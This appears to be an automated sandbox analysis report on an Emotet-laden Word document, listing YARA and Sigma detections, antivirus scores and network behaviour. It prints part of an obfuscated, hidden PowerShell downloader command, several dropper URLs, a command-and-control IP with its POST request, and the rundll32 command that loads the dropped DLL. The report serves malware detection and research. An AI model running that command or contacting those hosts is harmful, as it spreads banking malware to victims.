00000010.00000002.2195824360.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2097343885.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2206163057.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2110270893.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author
12.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.130000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.6d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.6d0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.220000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.100000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.1e0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.720000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3b0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.200000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.100000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.220000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.130000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.10000000.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.6b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.220000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.1e0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.2a0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.220000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.10000000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.260000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.260000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.6b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.2a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.rundll32.exe.720000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 67 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2360, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1, ProcessId: 2708

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAK

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://lvnskin.com/h/IB/	Avira URL Cloud: Label: malware
Source: http://nadysa.com/wp-content/Almet/	Avira URL Cloud: Label: malware
Source: http://crooks-taylor.com/1676470973/1/	Avira URL Cloud: Label: malware
Source: http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/	Avira URL Cloud: Label: malware
Source: http://rex.tasmiragroup.com/wp-includes/un6G/	Avira URL Cloud: Label: malware
Source: http://whitetheme.xyz/wp-content/q8H/	Avira URL Cloud: Label: malware
Source: http://boomarketer.com/wp-content/6/	Avira URL Cloud: Label: malware
Source: http://nadysa.com	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://lvnskin.com/h/IB/	Virustotal: Detection: 11%	Perma Link
Source: http://nadysa.com/wp-content/Almet/	Virustotal: Detection: 14%	Perma Link
Source: http://crooks-taylor.com/1676470973/1/	Virustotal: Detection: 13%	Perma Link
Source: http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Liq8l58\Egok7ei\D64O.dll	Metadefender: Detection: 45%			Perma Link
Source: C:\Users\user\Liq8l58\Egok7ei\D64O.dll	ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Show sources

Source: MENSAJE.doc

Virustotal: Detection: 61%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\Liq8l58\Egok7ei\D64O.dll

Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095398011.000000001B840000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: nadysa.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 217.144.106.11:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 217.144.106.11:80

Networking:

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp

String found in memory: http://nadysa.com/wp-content/Almet/!http://boomarketer.com/wp-content/6/!http://crooks-taylor.com/1676470973/1/!http://whitetheme.xyz/wp-content/q8H/!http://rex.tasmiragroup.com/wp-includes/un6G/!http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/!http://lvnskin.com/h/IB/

Source: global traffic

HTTP traffic detected: GET /wp-content/Almet/ HTTP/1.1Host: nadysa.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 84.232.229.24 84.232.229.24

Source: Joe Sandbox View	ASN Name: NETMIHANIR NETMIHANIR
Source: Joe Sandbox View	ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO

Source: global traffic

HTTP traffic detected: POST /v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/ HTTP/1.1DNT: 0Referer: 84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/Content-Type: multipart/form-data; boundary=--------------9AYnZdeXqkvt9nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 84.232.229.24Content-Length: 5972Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4380F3E0-FFD8-4816-B513-C2DC6937B540}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /wp-content/Almet/ HTTP/1.1Host: nadysa.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: nadysa.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	String found in binary or memory: http://boomarketer.com/wp-content/6/
Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	String found in binary or memory: http://crooks-taylor.com/1676470973/1/
Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	String found in binary or memory: http://lvnskin.com/h/IB/
Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://nadysa.com
Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2094995168.000000001B36A000.00000004.00000001.sdmp	String found in binary or memory: http://nadysa.com/wp-content/Almet/
Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	String found in binary or memory: http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/
Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	String found in binary or memory: http://rex.tasmiragroup.com/wp-includes/un6G/
Source: powershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp	String found in binary or memory: http://whitetheme.xyz/wp-content/q8H/
Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2108873547.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2097454036.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2163054350.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2163067625.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2118727946.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2178762795.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2336521474.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2154976635.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2108849548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2152593179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
